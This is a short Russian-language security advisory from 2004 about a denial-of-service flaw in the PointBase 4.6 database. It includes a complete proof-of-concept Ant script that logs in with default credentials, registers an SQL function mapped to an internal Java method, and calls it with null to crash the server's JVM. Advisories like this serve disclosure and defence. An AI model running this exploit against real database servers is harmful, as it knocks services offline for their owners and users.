Security Lab

DoS против базы данных PointBase

Дата публикации:25.01.2004
Всего просмотров:1676
Опасность:
Средняя
Наличие исправления:
Количество уязвимостей:1
CVE ID: Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID: Нет данных
Наличие эксплоита: Нет данных
Уязвимые продукты:
Уязвимые версии: PointBase 4.6

Описание: Уязвимость обнаружена в базе данных PointBase. Удаленный пользователь может аварийно завершить работу целевой системы, на которой запущен PointBase.

В конфигурации по умолчанию PointBase на все jar файлы установлены все разрешения. В результате удаленный пользователь может представить специально обработанную PointBase команду, чтобы завершить работу основной виртуальной Java машины.

Пример/Эксплоит:

.(.!-- pointbase denial-of-service by marc schoenefeld --".).

.(.project default="dos".).

.(.property name="host" value="192.168.0.7"/.).

.(.target name="dos".).
.(.sql
    driver="com.pointbase.jdbc.jdbcUniversalDriver"
    url="jdbc:pointbase://${host}:9092/sample"
    userid="pbpublic"
    password="pbpublic"
    print="true"
    .).
.(.![CDATA[
//DROP FUNCTION CRASH5(VARCHAR(20));
CREATE FUNCTION CRASH5(IN P1 VARCHAR(20)) RETURNS VARCHAR(20) LANGUAGE JAVA
NO SQL EXTERNAL NAME "sun.misc.MessageUtils::toStderr" PARAMETER  STYLE SQL;
SELECT CRASH5(null) from SYSUSERS;
]].).
.(.classpath.).
	.(.pathelement location="pbclient.jar"/.).
.(./classpath.).

.(./sql.).

.(./target.).

.(./project.). 

URL производителя: http://www.pointbase.com/node.shtml?navHier=Products/Products+Overview&CF=products/overview.jsp

Решение:Способов устранения обнаруженной уязвимости не существует в настоящее время.

Ссылки: Proof-Of-Concept Denial-Of-Service Pointbase 4.6 Java SQL-DB